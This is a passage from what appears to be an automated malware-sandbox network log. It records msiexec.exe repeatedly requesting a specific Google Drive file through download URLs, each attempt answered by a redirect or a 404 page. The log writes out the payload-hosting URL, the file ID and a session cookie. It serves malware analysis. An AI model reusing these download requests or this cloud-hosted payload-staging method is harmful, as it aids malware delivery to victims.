                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  53192.168.2.550029142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:22 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:22 UTC1844INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFIdbgS4QAcIbMVVkyTbs48hCOPEBIq15VIKR0gKasEHkeQsy8txvoijF-710yvs-_YPZPiZ
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:22 GMT
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-Vl-VsQ_AA_8cARbWBqSpAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:17:22 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 53 75 41 6e 74 50 65 5f 39 52 74 44 70 6d 51 74 64 66 73 6d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LSuAntPe_9RtDpmQtdfsmg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  54192.168.2.550030142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:23 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:23 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:23 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-is4pyXfZE-LiBzGEcvjSxg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  55192.168.2.550031142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:24 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:24 UTC1844INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFiumC7CMAGJ4P3RtyKYTI_yma83CL7-J_fRvHl256OCmtZsctdshbHOewqllw7XKhzH1gRT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:24 GMT
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-Ghh6kxvTLUmoona5PEFyIQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:17:24 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 57 76 77 6a 41 50 38 69 45 37 57 62 4e 4f 6b 33 75 62 57 51 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tWvwjAP8iE7WbNOk3ubWQw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  56192.168.2.550032142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:25 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:26 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:26 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-Gwdz847WSO4YWL40ykglsw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  57192.168.2.550033142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:26 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:27 UTC1851INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFIdbgTFMWbpsmnbaCvbReq2toZ54cu0uQoalTbeQsa6QXdM4F2KahWDcd6Y1uu1KlMPVr009ttaFPg
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:27 GMT
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-fBMqfU6SJCLS9gQ2sVKgVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:17:27 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 42 34 56 6c 79 53 41 35 42 50 43 69 6e 31 69 6a 56 56 32 75 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TB4VlySA5BPCin1ijVV2ug">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  58192.168.2.550034142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:28 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:28 UTC1920INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:28 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-QvDEU04pqcLJG9Lm143ztQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  59192.168.2.550035142.250.185.1934437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:29 UTC470OUTGET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Cache-Control: no-cache
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
                                                                  2025-01-10 14:17:29 UTC1851INHTTP/1.1 404 Not Found
                                                                  X-GUploader-UploadID: AFiumC6YG-wP533zpSW2Pgig2gAcDyko8FuE_9TTL-2SHGo1eVinD9k5pEpfnMDHBhu7zUY_6NlGVtA
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Fri, 10 Jan 2025 14:17:29 GMT
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-_RYoBGADUpc2arExJVO_Ig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Length: 1652
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                  Connection: close
                                                                  2025-01-10 14:17:29 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 33 46 4d 33 76 47 35 56 42 47 4e 30 71 52 30 69 63 34 7a 57 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="53FM3vG5VBGN0qR0ic4zWg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  60192.168.2.550036142.250.184.2064437064C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-10 14:17:30 UTC428OUTGET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: drive.google.com
